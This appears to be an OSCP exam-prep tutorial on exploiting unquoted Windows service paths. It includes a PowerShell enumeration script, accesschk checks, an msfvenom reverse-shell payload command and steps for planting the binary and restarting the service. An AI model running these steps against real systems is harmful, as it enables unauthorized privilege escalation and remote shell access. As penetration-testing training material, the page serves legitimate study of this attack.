Unquoted service paths
A properly configured service path would look something like this:
"C:\Program Files (x86)\Common Files\Steam\SteamService.exe"
You might, however, come across a misconfigured service path during your OSCP exam. An unquoted service path would look something like this:
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
This can be a vulnerability because of how Windows parses an unquoted path that contains spaces. CreateProcess cannot tell where the executable name ends and the arguments begin, so it cuts the string at every space, appends '.exe' to any cut that has no extension, and runs the first file it finds.
For the path above it would try, in order:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Common.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
This means that if you have write permissions on 'C:\' or on 'C:\Program Files (x86)\', you can drop a malicious 'Program.exe' or 'Common.exe' there and Windows will run it instead of the real binary. Note that the file name is the next path component up to the space, not the name of the real service executable.
All you'd have to do then is restart the service (or reboot, if it starts automatically) to execute your malicious file.
But first, you need to run a few checks because:
You might not have write permissions on any of the directories Windows searches
You might be unable to stop and start the service
The service might not be running as SYSTEM or another privileged account, in which case the shell you get is no escalation
Check for unquoted service paths with winPEAS
winpeas.exe
Do you have permissions to start and stop the service? (look for SERVICE_START and SERVICE_STOP, or SERVICE_ALL_ACCESS, for your user or one of your groups)
Download accesschk.exe (Sysinternals) to the target:
accesschk.exe /accepteula -ucqv <USER> <SERVICE>
Do you have write permissions for any of the directories? (-w lists only write access, -d checks the directory itself rather than its contents; check every directory that one of the candidate file names would land in)
accesschk.exe /accepteula -uwdq "C:\DIRECTORY\PATH"
Example:
accesschk.exe /accepteula -uwdq "C:\"
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\"
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Common Files\Steam\"
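The same enumeration in PowerShell, as an added example that is not part of the original page or of winPEAS: it lists services whose ImagePath is unquoted and contains a space, works out the file names CreateProcess would try before reaching the real binary, and flags the ones whose directory the current user's ACL entries allow writing to. It also shows the account each service runs as, which covers the third check above. Function names are my own, the ACL test is a heuristic rather than a full access check (confirm hits with accesschk), and it assumes Windows PowerShell on the target.

```powershell
# Added example, not from the original page. Assumes Windows PowerShell with
# WMI access; Get-WmiObject is used because it exists on every version that
# still shows up on old boxes (Get-CimInstance is the modern equivalent).

function Get-CreateProcessCandidates {
    # Reproduce CreateProcess's handling of an unquoted command line: cut the
    # string at each space, append .exe when the cut has no extension, and stop
    # at the first file that exists, because that is the one Windows would run.
    param([string]$CommandLine)
    $candidates = @()
    $pos = 0
    while ($true) {
        $space  = $CommandLine.IndexOf(' ', $pos)
        $prefix = if ($space -lt 0) { $CommandLine } else { $CommandLine.Substring(0, $space) }
        $leaf   = $prefix.Substring($prefix.LastIndexOf('\') + 1)
        if ($leaf -notmatch '\.') { $prefix += '.exe' }
        $candidates += $prefix
        $exists = Test-Path -LiteralPath $prefix -PathType Leaf -ErrorAction SilentlyContinue
        if ($space -lt 0 -or $exists) { break }
        $pos = $space + 1
    }
    return $candidates
}

function Test-DirectoryWritable {
    # ACL heuristic: an Allow ACE for the current user or one of its groups that
    # carries the CreateFiles/WriteData bit (0x2, also set by Write, Modify and
    # FullControl), and no matching Deny ACE. Good enough to shortlist
    # directories for accesschk; it is not a full access check.
    param([string]$Directory)
    if ([string]::IsNullOrEmpty($Directory)) { return $false }
    if (-not (Test-Path -LiteralPath $Directory -PathType Container -ErrorAction SilentlyContinue)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Directory } catch { return $false }
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if ($sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band 2) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Find-UnquotedServicePaths {
    # PathName is the raw ImagePath; unquoted and containing a space is the
    # precondition. StartName shows whether a hijack would land you SYSTEM.
    Get-WmiObject Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in (Get-CreateProcessCandidates $svc.PathName)) {
                # Directory the candidate would have to be planted in, e.g. "C:\"
                # for "C:\Program.exe".
                $dir = $candidate.Substring(0, $candidate.LastIndexOf('\') + 1)
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    StartMode = $svc.StartMode
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable $dir
                }
            }
        }
}

# Show only the candidates you could actually plant; drop the Where-Object
# filter to see every service that matches the precondition.
Find-UnquotedServicePaths | Where-Object Writable | Format-Table -AutoSize
```

A hit in the output is a candidate file name plus a writable directory; the RunsAs column tells you whether planting it is worth the effort, and you still need the accesschk service check above to confirm you can stop and start the service.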
Let's assume you have write permissions for the 'C:\Program Files (x86)\' directory, so the candidate Windows will pick up is 'C:\Program Files (x86)\Common.exe'.
Generate a reverse shell payload. Use the exe-service format: a plain exe does not answer the Service Control Manager, which kills it after about 30 seconds, whereas an exe-service payload keeps the shell alive:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe-service > Common.exe # the file name must match the candidate Windows tries in the writable directory, not the real service binary
Download your payload to the target and copy it into the writable directory under the candidate name:
copy Common.exe "C:\Program Files (x86)\Common.exe"
Set up a listener in Metasploit (multi/handler with the same payload, since windows/shell/reverse_tcp is staged) and restart the service:
net stop <SERVICE>
net start <SERVICE>
If you can't stop the service but its start mode is Automatic and you are allowed to reboot the box, a reboot does the same job.